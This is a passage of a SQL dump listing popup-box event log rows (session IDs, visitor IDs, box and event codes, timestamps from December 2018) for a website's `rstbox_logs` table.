(40985, '8d6bbfb3639f039a68eacfff70b21fa7', '74aba437eea39f30', 0, 2, 1, '2018-12-19 18:25:38'),
(40986, 'f7cd717c92ee3a59bae749e575f58a8f', 'd11c71184ec28f6f', 0, 2, 1, '2018-12-19 18:25:41'),
(40987, 'a425b236c1dec454e0e751358bc643ce', '4bc1bfd1f90e68e5', 0, 2, 1, '2018-12-19 18:25:42'),
(40988, 'c2509bf1ca4f699fe9c32b3f260a23d7', 'b0b809dfb20904a9', 0, 2, 1, '2018-12-19 18:25:42'),
(40989, '75730a57bc73700b2e190a554012583e', '503a514a8daa32a7', 0, 2, 1, '2018-12-19 18:25:43'),
(40990, 'ebdd88a7016b868c519e960b93de59eb', '1c68b977b911188c', 0, 2, 1, '2018-12-19 18:25:45'),
(40991, '8d6bbfb3639f039a68eacfff70b21fa7', '74aba437eea39f30', 0, 2, 1, '2018-12-19 18:25:51'),
(40992, 'c07b27f4d823fa4c548d79fdc85cef28', 'dace6e0c219330fc', 0, 2, 1, '2018-12-19 18:25:55'),
(40993, 'f4675ef81d1d7e0985f9b4725ffd53fd', 'e706e9a0184b2202', 0, 2, 1, '2018-12-19 18:25:56'),
(40994, '1d66dac68c583600adbae488eea298a6', 'f19010d8a5f137d0', 0, 2, 1, '2018-12-19 18:26:08'),
(40995, '7bb8acd6871d6a8341fc320ef0ade5d3', '6bc7e1c1fc1a8680', 0, 2, 1, '2018-12-19 18:26:14'),
(40996, 'ebdd88a7016b868c519e960b93de59eb', '1c68b977b911188c', 0, 2, 1, '2018-12-19 18:26:21'),
(40997, '75730a57bc73700b2e190a554012583e', '503a514a8daa32a7', 0, 2, 1, '2018-12-19 18:26:26'),
(40998, '97088562a56cd0e791f20f15043039bd', '411809a73756d39c', 0, 2, 1, '2018-12-19 18:26:34'),
(40999, '37e1a82e135df305646b770cb59ce8f8', '4c07673592205f17', 0, 2, 1, '2018-12-19 18:26:36'),
(41000, '317e28971460944a715488c01178478c', 'dba49dcafdc2b991', 0, 2, 1, '2018-12-19 18:26:43'),
(41001, '97088562a56cd0e791f20f15043039bd', '411809a73756d39c', 0, 2, 1, '2018-12-19 18:26:47'),
(41002, 'dffbb6623e5093ed972cb2a4b37d3ed9', '6e117bd555667400', 0, 2, 1, '2018-12-19 18:26:49'),
(41003, 'ebdd88a7016b868c519e960b93de59eb', '1c68b977b911188c', 0, 2, 1, '2018-12-19 18:26:51'),
(41004, 'c4aafed9c1f827a1d198a6890ebb3731', 'df27b9a2919a8206', 0, 2, 1, '2018-12-19 18:27:02'),
(41005, 'ce642335ceacd38f4de652f9eca4f47b', '4574603cf07e6399', 0, 2, 1, '2018-12-19 18:27:10'),
(41006, '1d66dac68c583600adbae488eea298a6', 'f19010d8a5f137d0', 0, 2, 1, '2018-12-19 18:27:10'),
(41007, 'c04ffca6c5a8ba7bba6099e506d0c943', '32b169e936bbe5df', 0, 2, 1, '2018-12-19 18:27:11'),
(41008, 'f4675ef81d1d7e0985f9b4725ffd53fd', 'e706e9a0184b2202', 0, 2, 1, '2018-12-19 18:27:18'),
(41009, '37e1a82e135df305646b770cb59ce8f8', '4c07673592205f17', 0, 2, 1, '2018-12-19 18:27:20'),
(41010, '75730a57bc73700b2e190a554012583e', '503a514a8daa32a7', 0, 2, 1, '2018-12-19 18:27:21'),
(41011, 'aef7d4cabd9c096a47b1b51450398827', '54c6c0fa0e212c40', 0, 2, 1, '2018-12-19 18:27:26'),
(41012, 'c07b27f4d823fa4c548d79fdc85cef28', 'dace6e0c219330fc', 0, 2, 1, '2018-12-19 18:27:34'),
(41013, 'f4675ef81d1d7e0985f9b4725ffd53fd', 'e706e9a0184b2202', 0, 2, 1, '2018-12-19 18:27:36'),
(41014, '37e1a82e135df305646b770cb59ce8f8', '4c07673592205f17', 0, 2, 1, '2018-12-19 18:27:48'),
(41015, '23b6546619317515072afd6ec9f80338', '6bc7e1c1fc1a8680', 0, 2, 1, '2018-12-19 18:27:52'),
(41016, 'add79ccc28210a9e63d0f3df5025aa9d', 'b0d0f692147f0dd4', 0, 2, 1, '2018-12-19 18:27:52'),
(41017, 'f4675ef81d1d7e0985f9b4725ffd53fd', 'e706e9a0184b2202', 0, 2, 1, '2018-12-19 18:28:00'),
(41018, '4c293aaf81bf810d6e65eae55fcc96e7', '798d56d8d5e68e06', 0, 2, 1, '2018-12-19 18:28:01'),
(41019, '23b6546619317515072afd6ec9f80338', '6bc7e1c1fc1a8680', 0, 2, 1, '2018-12-19 18:28:03'),
(41020, 'ebdd88a7016b868c519e960b93de59eb', '1c68b977b911188c', 0, 2, 1, '2018-12-19 18:28:07'),
(41021, 'dffbb6623e5093ed972cb2a4b37d3ed9', '6e117bd555667400', 0, 2, 1, '2018-12-19 18:28:09'),
(41022, '8e0b1af59c05619415266bdcfe0cfe64', 'a783a1253a9fde8e', 0, 2, 1, '2018-12-19 18:28:15'),
(41023, 'a7b09e396ee35acbb1dcc914303bdeed', '61eefb57e6c49666', 0, 2, 1, '2018-12-19 18:28:15'),
(41024, '23b6546619317515072afd6ec9f80338', '6bc7e1c1fc1a8680', 0, 2, 1, '2018-12-19 18:28:18'),
(41025, 'f4675ef81d1d7e0985f9b4725ffd53fd', 'e706e9a0184b2202', 0, 2, 1, '2018-12-19 18:28:35'),
(41026, 'f4675ef81d1d7e0985f9b4725ffd53fd', 'e706e9a0184b2202', 0, 2, 1, '2018-12-19 18:28:42'),
(41027, '75730a57bc73700b2e190a554012583e', '503a514a8daa32a7', 0, 2, 1, '2018-12-19 18:28:42'),
(41028, 'f4675ef81d1d7e0985f9b4725ffd53fd', 'e706e9a0184b2202', 0, 2, 1, '2018-12-19 18:28:50'),
(41029, '1d66dac68c583600adbae488eea298a6', 'f19010d8a5f137d0', 0, 2, 1, '2018-12-19 18:28:50'),
(41030, '6967b531dcf44fe00d0366d47626932f', 'b0d0f692147f0dd4', 0, 2, 1, '2018-12-19 18:28:59'),
(41031, '8e0b1af59c05619415266bdcfe0cfe64', 'a783a1253a9fde8e', 0, 2, 1, '2018-12-19 18:28:59'),
(41032, '92e014ef1b2e6b38f28c94384b825a41', 'b800ba4fd7a89f76', 0, 2, 1, '2018-12-19 18:29:03'),
(41033, 'f4675ef81d1d7e0985f9b4725ffd53fd', 'e706e9a0184b2202', 0, 2, 1, '2018-12-19 18:29:05'),
(41034, '37e1a82e135df305646b770cb59ce8f8', '4c07673592205f17', 0, 2, 1, '2018-12-19 18:29:08'),
(41035, 'ebdd88a7016b868c519e960b93de59eb', '1c68b977b911188c', 0, 2, 1, '2018-12-19 18:29:12'),
(41036, '15f2b429e7e46b3172e5350639274274', '288a3fac1565dd18', 0, 2, 1, '2018-12-19 18:29:18'),
(41037, 'ad8dde9f5b7a66718affee414fea342a', '93f30eaefda9d8c4', 0, 2, 1, '2018-12-19 18:29:23'),
(41038, '832101422a765b14fbaf3b9b7abfec87', 'b453f7c003bf64ff', 0, 2, 1, '2018-12-19 18:29:25'),
(41039, 'b7e9fae8f07ad816c89b06f976b63487', '0fae00ead49208b7', 0, 2, 1, '2018-12-19 18:29:25'),
(41040, 'c07b27f4d823fa4c548d79fdc85cef28', 'dace6e0c219330fc', 0, 2, 1, '2018-12-19 18:29:27'),
(41041, '286683e535a3dda57aa49243cf79de1f', '6bc7e1c1fc1a8680', 0, 2, 1, '2018-12-19 18:29:27'),
(41042, '8e0b1af59c05619415266bdcfe0cfe64', 'a783a1253a9fde8e', 0, 2, 1, '2018-12-19 18:29:48'),
(41043, '37e1a82e135df305646b770cb59ce8f8', '4c07673592205f17', 0, 2, 1, '2018-12-19 18:29:56'),
(41044, 'c07b27f4d823fa4c548d79fdc85cef28', 'dace6e0c219330fc', 0, 2, 1, '2018-12-19 18:30:01'),
(41045, '9f5667049c9329b00d513dd8d30555b1', '296d9de09b136627', 0, 2, 1, '2018-12-19 18:30:05'),
(41046, '15f2b429e7e46b3172e5350639274274', '288a3fac1565dd18', 0, 2, 1, '2018-12-19 18:30:11'),
(41047, '75730a57bc73700b2e190a554012583e', '503a514a8daa32a7', 0, 2, 1, '2018-12-19 18:30:13'),
(41048, 'b9d32e533664efc04cdb40e96ebbb1ed', '3de88ff4581dab27', 0, 2, 1, '2018-12-19 18:30:15'),
(41049, '1d66dac68c583600adbae488eea298a6', 'f19010d8a5f137d0', 0, 2, 1, '2018-12-19 18:30:19'),
(41050, '1d66dac68c583600adbae488eea298a6', 'f19010d8a5f137d0', 0, 2, 1, '2018-12-19 18:30:28'),
(41051, '6e2fef77cf395c3ba2fbf264f02510ac', '6bc7e1c1fc1a8680', 0, 2, 1, '2018-12-19 18:30:38'),
(41052, '4c293aaf81bf810d6e65eae55fcc96e7', '798d56d8d5e68e06', 0, 2, 1, '2018-12-19 18:30:42'),
(41053, 'ebdd88a7016b868c519e960b93de59eb', '1c68b977b911188c', 0, 2, 1, '2018-12-19 18:30:47'),
(41054, 'f4675ef81d1d7e0985f9b4725ffd53fd', 'e706e9a0184b2202', 0, 2, 1, '2018-12-19 18:30:54'),
(41055, '37e1a82e135df305646b770cb59ce8f8', '4c07673592205f17', 0, 2, 1, '2018-12-19 18:30:59'),
(41056, '79428aea1d23035a5292b5937ff84601', 'a5736c988cfb53ac', 0, 2, 1, '2018-12-19 18:31:00'),
(41057, 'f4675ef81d1d7e0985f9b4725ffd53fd', 'e706e9a0184b2202', 0, 2, 1, '2018-12-19 18:31:03'),
(41058, 'b9d32e533664efc04cdb40e96ebbb1ed', '3de88ff4581dab27', 0, 2, 1, '2018-12-19 18:31:06'),
(41059, '75730a57bc73700b2e190a554012583e', '503a514a8daa32a7', 0, 2, 1, '2018-12-19 18:31:07'),
(41060, 'b272de3acf0e7abaf04f11bc934d0898', 'e3413f2163c4f64a', 0, 2, 1, '2018-12-19 18:31:10'),
(41061, 'f4675ef81d1d7e0985f9b4725ffd53fd', 'e706e9a0184b2202', 0, 2, 1, '2018-12-19 18:31:19'),
(41062, 'f4675ef81d1d7e0985f9b4725ffd53fd', 'e706e9a0184b2202', 0, 2, 1, '2018-12-19 18:31:29'),
(41063, 'bc8c341542c8f0860e7c12c67b27632e', 'c454d725c5518f16', 0, 2, 1, '2018-12-19 18:31:30'),
(41064, '9446f2541388c51b6b3a38f7028f4c54', 'e996039688368fa6', 0, 2, 1, '2018-12-19 18:31:32'),
(41065, 'e9aa1e00847595b53f2d4f6e4b9faee5', '9234c34668bf2ded', 0, 2, 1, '2018-12-19 18:31:40'),
(41066, '9446f2541388c51b6b3a38f7028f4c54', 'e996039688368fa6', 0, 2, 1, '2018-12-19 18:31:40'),
(41067, '37e1a82e135df305646b770cb59ce8f8', '4c07673592205f17', 0, 2, 1, '2018-12-19 18:31:49'),
(41068, '92e014ef1b2e6b38f28c94384b825a41', 'b800ba4fd7a89f76', 0, 2, 1, '2018-12-19 18:32:05'),
(41069, 'b272de3acf0e7abaf04f11bc934d0898', 'e3413f2163c4f64a', 0, 2, 1, '2018-12-19 18:32:14'),
(41070, '05ae76e52e5c523850b16a34e041a536', '1b5e475496daa72c', 0, 2, 1, '2018-12-19 18:32:23'),
(41071, '37e1a82e135df305646b770cb59ce8f8', '4c07673592205f17', 0, 2, 1, '2018-12-19 18:32:28'),
(41072, 'f4675ef81d1d7e0985f9b4725ffd53fd', 'e706e9a0184b2202', 0, 2, 1, '2018-12-19 18:32:30'),
(41073, '6967b531dcf44fe00d0366d47626932f', 'b0d0f692147f0dd4', 0, 2, 1, '2018-12-19 18:32:31'),
(41074, '92e014ef1b2e6b38f28c94384b825a41', 'b800ba4fd7a89f76', 0, 2, 1, '2018-12-19 18:32:35'),
(41075, 'f4675ef81d1d7e0985f9b4725ffd53fd', 'e706e9a0184b2202', 0, 2, 1, '2018-12-19 18:32:38'),
(41076, '37e1a82e135df305646b770cb59ce8f8', '4c07673592205f17', 0, 2, 1, '2018-12-19 18:32:53'),
(41077, 'f707a50c66712b45a64409ce22483258', '179bf8d6cbaf2be0', 0, 2, 1, '2018-12-19 18:32:57'),
(41078, '9bd1bd29be5e92ac215e31323e85cfa8', '78e991b1579a8a7c', 0, 2, 1, '2018-12-19 18:33:11'),
(41079, 'f707a50c66712b45a64409ce22483258', '179bf8d6cbaf2be0', 0, 2, 1, '2018-12-19 18:33:12'),
(41080, '05ae76e52e5c523850b16a34e041a536', '1b5e475496daa72c', 0, 2, 1, '2018-12-19 18:33:33'),
(41081, '9d4cc5bf10da5ff2875af961f8f6059c', 'd11c71184ec28f6f', 0, 2, 1, '2018-12-19 18:33:51'),
(41082, '05ae76e52e5c523850b16a34e041a536', '1b5e475496daa72c', 0, 2, 1, '2018-12-19 18:33:57'),
(41083, '05ae76e52e5c523850b16a34e041a536', '1b5e475496daa72c', 0, 2, 1, '2018-12-19 18:34:01'),
(41084, 'e9aa1e00847595b53f2d4f6e4b9faee5', '9234c34668bf2ded', 0, 2, 1, '2018-12-19 18:34:06'),
(41085, 'dffbb6623e5093ed972cb2a4b37d3ed9', '6e117bd555667400', 0, 2, 1, '2018-12-19 18:34:17'),
(41086, 'c4aafed9c1f827a1d198a6890ebb3731', 'df27b9a2919a8206', 0, 2, 1, '2018-12-19 18:34:44'),
(41087, 'e15834d7502b275cb67812065ee6bd5b', '45720d417fbe3881', 0, 2, 1, '2018-12-19 18:34:53'),
(41088, 'e29873239adf6a03cb562d8e69816f8a', '288a3fac1565dd18', 0, 2, 1, '2018-12-19 18:34:55'),
(41089, 'aef7d4cabd9c096a47b1b51450398827', '54c6c0fa0e212c40', 0, 2, 1, '2018-12-19 18:34:59'),
(41090, 'e15834d7502b275cb67812065ee6bd5b', '45720d417fbe3881', 0, 2, 1, '2018-12-19 18:34:59'),
(41091, '7eef04486e23e13c8622b08788307a99', 'd56cabc2a9cf20cc', 0, 2, 1, '2018-12-19 18:35:08'),
(41092, '854015a41ea8a5b133cd58ac4545e21a', '220b6bed49713ca3', 0, 2, 1, '2018-12-19 18:35:08'),
(41093, 'aef7d4cabd9c096a47b1b51450398827', '54c6c0fa0e212c40', 0, 2, 1, '2018-12-19 18:35:17'),
(41094, 'aef7d4cabd9c096a47b1b51450398827', '54c6c0fa0e212c40', 0, 2, 1, '2018-12-19 18:35:48'),
(41095, '5f5902fb7133559039e5eaf67c96deb2', 'd29852129d325244', 0, 2, 1, '2018-12-19 18:35:59'),
(41096, 'aef7d4cabd9c096a47b1b51450398827', '54c6c0fa0e212c40', 0, 2, 1, '2018-12-19 18:36:04'),
(41097, 'aef7d4cabd9c096a47b1b51450398827', '54c6c0fa0e212c40', 0, 2, 1, '2018-12-19 18:36:13'),
(41098, 'aef7d4cabd9c096a47b1b51450398827', '54c6c0fa0e212c40', 0, 2, 1, '2018-12-19 18:36:25'),
(41099, '8d6bbfb3639f039a68eacfff70b21fa7', '74aba437eea39f30', 0, 2, 1, '2018-12-19 18:36:34'),
(41100, 'e29873239adf6a03cb562d8e69816f8a', '288a3fac1565dd18', 0, 2, 1, '2018-12-19 18:36:47'),
(41101, '241a5cf8a38a2b7109ae21707a8b6cd3', 'c7d4ce8b0de12339', 0, 2, 1, '2018-12-19 18:37:23'),
(41102, '77103285c4ae2b1eb5da32899f720592', 'c123e74a1d22036a', 0, 2, 1, '2018-12-19 18:37:33'),
(41103, '9ca444f91da16cfb26228ecccb0f59e4', 'fcaa3c8d44082e09', 0, 2, 1, '2018-12-19 18:37:43'),
(41104, '0d51992b7021886461a5c0be35c4bd54', '4f54865a6d244b6c', 0, 2, 1, '2018-12-19 18:37:44'),
(41105, '9ca444f91da16cfb26228ecccb0f59e4', 'fcaa3c8d44082e09', 0, 2, 1, '2018-12-19 18:37:53'),
(41106, '77103285c4ae2b1eb5da32899f720592', 'c123e74a1d22036a', 0, 2, 1, '2018-12-19 18:38:05'),
(41107, '77103285c4ae2b1eb5da32899f720592', 'c123e74a1d22036a', 0, 2, 1, '2018-12-19 18:38:16'),
(41108, '61126c6f90c921d373c13fababa371f6', '196ae7616c94df27', 0, 2, 1, '2018-12-19 18:39:47'),
(41109, '91eb6e7a3c593c7be1ba52fdcbc87eb6', '85c05c059b3af615', 0, 2, 1, '2018-12-19 18:39:48'),
(41110, '77103285c4ae2b1eb5da32899f720592', 'c123e74a1d22036a', 0, 2, 1, '2018-12-19 18:40:39'),
(41111, '879e0308acc29f096d7d65ea56e6cef9', '455b7af7b80ccb4a', 0, 2, 1, '2018-12-19 18:41:03'),
(41112, '77103285c4ae2b1eb5da32899f720592', 'c123e74a1d22036a', 0, 2, 1, '2018-12-19 18:41:26'),
(41113, 'ce642335ceacd38f4de652f9eca4f47b', '4574603cf07e6399', 0, 2, 1, '2018-12-19 18:41:39'),
(41114, 'ce642335ceacd38f4de652f9eca4f47b', '4574603cf07e6399', 0, 2, 1, '2018-12-19 18:42:04'),
(41115, '317e28971460944a715488c01178478c', 'dba49dcafdc2b991', 0, 2, 1, '2018-12-19 18:42:33'),
(41116, 'af00bc2577c78c3abf356e4ab49e5886', '0b83b588375e9508', 0, 2, 1, '2018-12-19 18:42:44'),
(41117, '205c836769ea0961f2cdf5e9db360569', '0bc395b89de29e67', 0, 2, 1, '2018-12-19 18:42:47'),
(41118, 'e29873239adf6a03cb562d8e69816f8a', '288a3fac1565dd18', 0, 2, 1, '2018-12-19 18:43:37'),
(41119, '75730a57bc73700b2e190a554012583e', '503a514a8daa32a7', 0, 2, 1, '2018-12-19 18:44:22'),
(41120, '75730a57bc73700b2e190a554012583e', '503a514a8daa32a7', 0, 2, 1, '2018-12-19 18:45:08'),
(41121, '241a5cf8a38a2b7109ae21707a8b6cd3', 'c7d4ce8b0de12339', 0, 2, 1, '2018-12-19 18:45:12'),
(41122, '3ad1cb833da0626cbcbfaa5ab5df0934', '7501b42c35accff7', 0, 2, 1, '2018-12-19 18:45:32'),
(41123, 'bc8c341542c8f0860e7c12c67b27632e', 'c454d725c5518f16', 0, 2, 1, '2018-12-19 18:45:53'),
(41124, '23bcc3a54b1834c2ae410d25bc56a89c', 'c858904cdd51199c', 0, 2, 1, '2018-12-19 18:45:58'),
(41125, 'd3b61c44819d93f4f1d3a5b23855d1bc', '1de1882ebcb8b7b6', 0, 2, 1, '2018-12-19 18:46:40'),
(41126, 'f707a50c66712b45a64409ce22483258', '179bf8d6cbaf2be0', 0, 2, 1, '2018-12-19 18:47:29'),
(41127, 'e29873239adf6a03cb562d8e69816f8a', '288a3fac1565dd18', 0, 2, 1, '2018-12-19 18:48:25'),
(41128, '37e1a82e135df305646b770cb59ce8f8', '4c07673592205f17', 0, 2, 1, '2018-12-19 18:48:37'),
(41129, 'd0ab4749381cab279f550a081fed6afc', 'dd0438c71cec594e', 0, 2, 1, '2018-12-19 18:50:30'),
(41130, 'd0ab4749381cab279f550a081fed6afc', 'dd0438c71cec594e', 0, 2, 1, '2018-12-19 18:50:35'),
(41131, 'a93ec6a759660a2427b12e20f6743cf1', 'b5aa5bf58fedb8e0', 0, 2, 1, '2018-12-19 18:51:11'),
(41132, '74a14e2cb057d3c56e32e36f5761e2b2', '927c716025ccbd1c', 0, 2, 1, '2018-12-19 18:51:16'),
(41133, 'a93ec6a759660a2427b12e20f6743cf1', 'b5aa5bf58fedb8e0', 0, 2, 1, '2018-12-19 18:51:28'),
(41134, '9f5667049c9329b00d513dd8d30555b1', '296d9de09b136627', 0, 2, 1, '2018-12-19 18:54:38'),
(41135, '61126c6f90c921d373c13fababa371f6', '196ae7616c94df27', 0, 2, 1, '2018-12-19 18:55:51'),
(41136, 'afe6ed6b0ccfc1e9104fcbc3f98f9742', 'd253aa15f0650852', 0, 2, 1, '2018-12-19 18:55:58'),
(41137, '8a66a935f81e3821f81927b7b057399e', '7c5bcf99f2070582', 0, 2, 1, '2018-12-19 18:56:32'),
(41138, '9f5667049c9329b00d513dd8d30555b1', '296d9de09b136627', 0, 2, 1, '2018-12-19 18:58:53'),
(41139, '0b2a388e49d40e5b927554ac49df81f4', '9db00a26c605798e', 0, 2, 1, '2018-12-19 19:01:55'),
(41140, '184a465fd697b6c28e5af6b3b28a6d80', '29ef45db200a8f59', 0, 2, 1, '2018-12-19 19:02:07'),
(41141, 'a425b236c1dec454e0e751358bc643ce', '4bc1bfd1f90e68e5', 0, 2, 1, '2018-12-19 19:02:33'),
(41142, 'ebdd88a7016b868c519e960b93de59eb', '1c68b977b911188c', 0, 2, 1, '2018-12-19 19:02:43'),
(41143, '184a465fd697b6c28e5af6b3b28a6d80', '29ef45db200a8f59', 0, 2, 1, '2018-12-19 19:03:01'),
(41144, 'aaa6a1f3a0431167764ba5a11aa6d72b', 'ee0826f8778c48c2', 0, 2, 1, '2018-12-19 19:06:24'),
(41145, '89ed9face33c2dc06aaedb070725823c', 'c6e97f17cebc7ba8', 0, 2, 1, '2018-12-19 19:06:49'),
(41146, '89e623d5e99baa8553cd7a8e9677d319', 'c1fca6d49383a74a', 0, 2, 1, '2018-12-19 19:09:17'),
(41147, '89e623d5e99baa8553cd7a8e9677d319', 'c1fca6d49383a74a', 0, 2, 1, '2018-12-19 19:09:36'),
(41148, '3ad1cb833da0626cbcbfaa5ab5df0934', '7501b42c35accff7', 0, 2, 1, '2018-12-19 19:10:03'),
(41149, 'c2509bf1ca4f699fe9c32b3f260a23d7', 'b0b809dfb20904a9', 0, 2, 1, '2018-12-19 19:11:35'),
(41150, 'dffbb6623e5093ed972cb2a4b37d3ed9', '6e117bd555667400', 0, 2, 1, '2018-12-19 19:11:42'),
(41151, '23bcc3a54b1834c2ae410d25bc56a89c', 'c858904cdd51199c', 0, 2, 1, '2018-12-19 19:11:43'),
(41152, '89ed9face33c2dc06aaedb070725823c', 'c6e97f17cebc7ba8', 0, 2, 1, '2018-12-19 19:12:09'),
(41153, '89ed9face33c2dc06aaedb070725823c', 'c6e97f17cebc7ba8', 0, 2, 1, '2018-12-19 19:13:33'),
(41154, '3bd8a4b54c69aa63a73c4a9552d3a65e', '83bb13387505b354', 0, 2, 1, '2018-12-19 19:13:49'),
(41155, '32cf3a3b9bc19a6252db8c7becfc9e2b', 'ca137f6ef4b97d25', 0, 2, 1, '2018-12-19 19:13:54'),
(41156, '89ed9face33c2dc06aaedb070725823c', 'c6e97f17cebc7ba8', 0, 2, 1, '2018-12-19 19:14:00'),
(41157, '23bcc3a54b1834c2ae410d25bc56a89c', 'c858904cdd51199c', 0, 2, 1, '2018-12-19 19:14:16'),
(41158, '46b2c873cdee5b3f5b3c3ec22bc21d4e', 'f10990f26adcd1c5', 0, 2, 1, '2018-12-19 19:15:17'),
(41159, '3ad1cb833da0626cbcbfaa5ab5df0934', '7501b42c35accff7', 0, 2, 1, '2018-12-19 19:15:33'),
(41160, '89ed9face33c2dc06aaedb070725823c', 'c6e97f17cebc7ba8', 0, 2, 1, '2018-12-19 19:16:10'),
(41161, 'c178d0d047c891db3baee75cd19163be', '5b3b8ef076c797da', 0, 2, 1, '2018-12-19 19:16:58'),
(41162, 'bc8c341542c8f0860e7c12c67b27632e', 'c454d725c5518f16', 0, 2, 1, '2018-12-19 19:17:34'),
(41163, 'd0ab4749381cab279f550a081fed6afc', 'dd0438c71cec594e', 0, 2, 1, '2018-12-19 19:19:03'),
(41164, '136260980f1129dbd965ac523b10f76b', 'ba5fba7466ec0aa4', 0, 2, 1, '2018-12-19 19:19:39'),
(41165, 'f4675ef81d1d7e0985f9b4725ffd53fd', 'e706e9a0184b2202', 0, 2, 1, '2018-12-19 19:20:01'),
(41166, 'a425b236c1dec454e0e751358bc643ce', '4bc1bfd1f90e68e5', 0, 2, 1, '2018-12-19 19:20:59'),
(41167, 'c04ffca6c5a8ba7bba6099e506d0c943', '32b169e936bbe5df', 0, 2, 1, '2018-12-19 19:21:38'),
(41168, '13a57f4598a6cc0e33707fffefe83b7d', 'b5aa5bf58fedb8e0', 0, 2, 1, '2018-12-19 19:22:57'),
(41169, '19e7ff979f43e321a802abad1bf178c1', 'dcadb578720d99b9', 0, 2, 1, '2018-12-19 19:41:01'),
(41170, 'aaa6a1f3a0431167764ba5a11aa6d72b', 'ee0826f8778c48c2', 0, 2, 1, '2018-12-19 19:48:02'),
(41171, 'da71dbe75a2262c4a4bed06091725807', 'ec18b138536ee06e', 0, 2, 1, '2018-12-19 20:07:00'),
(41172, '48197a5952d5ad6cd48fd5b2b4baeb8c', 'f6269ce34ab6a362', 0, 2, 1, '2018-12-19 20:19:15'),
(41173, '6ac743408e1b1a78e4110db8faa53516', 'a2b92167f54c9dc2', 0, 2, 1, '2018-12-19 20:40:25'),
(41174, '6cb14cc4a35f4f4638f1a52d2fc8a538', 'c6e97f17cebc7ba8', 0, 2, 1, '2018-12-19 20:51:51'),
(41175, '51585a57b00d95a41f094565b39a9f34', 'ffc1384242f8f6e9', 0, 2, 1, '2018-12-19 20:52:30'),
(41176, '6ac743408e1b1a78e4110db8faa53516', 'a2b92167f54c9dc2', 0, 2, 1, '2018-12-19 20:57:30'),
(41177, '05ae76e52e5c523850b16a34e041a536', '1b5e475496daa72c', 0, 2, 1, '2018-12-19 21:19:47');
INSERT INTO `y57u5_rstbox_logs` (`id`, `sessionid`, `visitorid`, `user`, `box`, `event`, `date`) VALUES
(41178, '2d2d54fac8707787e978d9207e827293', 'eefcbb2a30d81ad8', 0, 2, 1, '2018-12-19 23:07:57'),
(41179, 'ad8dde9f5b7a66718affee414fea342a', '93f30eaefda9d8c4', 0, 2, 1, '2018-12-19 23:33:20'),
(41180, '6ac743408e1b1a78e4110db8faa53516', 'a2b92167f54c9dc2', 0, 2, 1, '2018-12-20 00:33:15'),
(41181, '6ac743408e1b1a78e4110db8faa53516', 'a2b92167f54c9dc2', 0, 2, 1, '2018-12-20 00:41:10'),
(41182, '6ac743408e1b1a78e4110db8faa53516', 'a2b92167f54c9dc2', 0, 2, 1, '2018-12-20 00:42:21'),
(41183, '6ac743408e1b1a78e4110db8faa53516', 'a2b92167f54c9dc2', 0, 2, 1, '2018-12-20 00:55:45'),
(41184, '6ac743408e1b1a78e4110db8faa53516', 'a2b92167f54c9dc2', 0, 2, 1, '2018-12-20 00:56:54'),
(41185, 'd56c509e91ad2d2c01076ab9df9e1b2e', 'baa8d16c1a4e5230', 0, 2, 1, '2018-12-20 01:29:38'),
(41186, 'd56c509e91ad2d2c01076ab9df9e1b2e', 'baa8d16c1a4e5230', 0, 2, 1, '2018-12-20 01:30:28'),
(41187, '6ac743408e1b1a78e4110db8faa53516', 'a2b92167f54c9dc2', 0, 2, 1, '2018-12-20 01:53:58'),
(41188, 'e4ade5dc67d64231db8441620aba4a7f', 'f61be112d9cb2646', 0, 2, 1, '2018-12-20 02:39:56'),
(41189, '27acf525be12adf5a7d8019f6b767d9c', '53045bd8cbfde752', 0, 2, 1, '2018-12-20 02:41:36'),
(41190, 'a08a60ccb4d491344ca56b0364110de0', '0f4c546141d66a80', 0, 2, 1, '2018-12-20 02:54:50'),
(41191, 'a08a60ccb4d491344ca56b0364110de0', '0f4c546141d66a80', 0, 2, 1, '2018-12-20 02:56:28'),
(41192, 'a08a60ccb4d491344ca56b0364110de0', '0f4c546141d66a80', 0, 2, 1, '2018-12-20 02:56:53'),
(41193, 'a08a60ccb4d491344ca56b0364110de0', '0f4c546141d66a80', 0, 2, 1, '2018-12-20 02:57:21'),
(41194, 'a08a60ccb4d491344ca56b0364110de0', '0f4c546141d66a80', 0, 2, 1, '2018-12-20 02:57:44'),
(41195, 'a08a60ccb4d491344ca56b0364110de0', '0f4c546141d66a80', 0, 2, 1, '2018-12-20 02:59:34'),
(41196, 'a08a60ccb4d491344ca56b0364110de0', '0f4c546141d66a80', 0, 2, 1, '2018-12-20 03:00:56'),
(41197, 'a08a60ccb4d491344ca56b0364110de0', '0f4c546141d66a80', 0, 2, 1, '2018-12-20 03:01:15'),
(41198, 'a08a60ccb4d491344ca56b0364110de0', '0f4c546141d66a80', 0, 2, 1, '2018-12-20 03:02:16'),
(41199, 'a08a60ccb4d491344ca56b0364110de0', '0f4c546141d66a80', 0, 2, 1, '2018-12-20 03:03:10'),
(41200, 'a08a60ccb4d491344ca56b0364110de0', '0f4c546141d66a80', 0, 2, 1, '2018-12-20 03:03:28'),
(41201, 'a08a60ccb4d491344ca56b0364110de0', '0f4c546141d66a80', 0, 2, 1, '2018-12-20 03:04:53'),
(41202, 'a08a60ccb4d491344ca56b0364110de0', '0f4c546141d66a80', 0, 2, 1, '2018-12-20 03:04:58'),
(41203, 'a08a60ccb4d491344ca56b0364110de0', '0f4c546141d66a80', 0, 2, 1, '2018-12-20 03:05:02'),
(41204, 'a08a60ccb4d491344ca56b0364110de0', '0f4c546141d66a80', 0, 2, 1, '2018-12-20 03:05:58'),
(41205, 'a08a60ccb4d491344ca56b0364110de0', '0f4c546141d66a80', 0, 2, 1, '2018-12-20 03:06:42'),
(41206, 'a08a60ccb4d491344ca56b0364110de0', '0f4c546141d66a80', 0, 2, 1, '2018-12-20 03:07:04'),
(41207, 'a08a60ccb4d491344ca56b0364110de0', '0f4c546141d66a80', 0, 2, 1, '2018-12-20 03:07:44'),
(41208, 'a08a60ccb4d491344ca56b0364110de0', '0f4c546141d66a80', 0, 2, 1, '2018-12-20 03:08:55'),
(41209, 'a08a60ccb4d491344ca56b0364110de0', '0f4c546141d66a80', 0, 2, 1, '2018-12-20 03:12:21'),
(41210, 'a08a60ccb4d491344ca56b0364110de0', '0f4c546141d66a80', 0, 2, 1, '2018-12-20 03:13:06'),
(41211, 'a08a60ccb4d491344ca56b0364110de0', '0f4c546141d66a80', 0, 2, 1, '2018-12-20 03:14:01'),
(41212, 'a08a60ccb4d491344ca56b0364110de0', '0f4c546141d66a80', 0, 2, 1, '2018-12-20 03:16:02'),
(41213, '7787c8cd09f96f0209023ee371a16466', 'f67c975198ed386d', 0, 2, 1, '2018-12-20 03:21:30'),
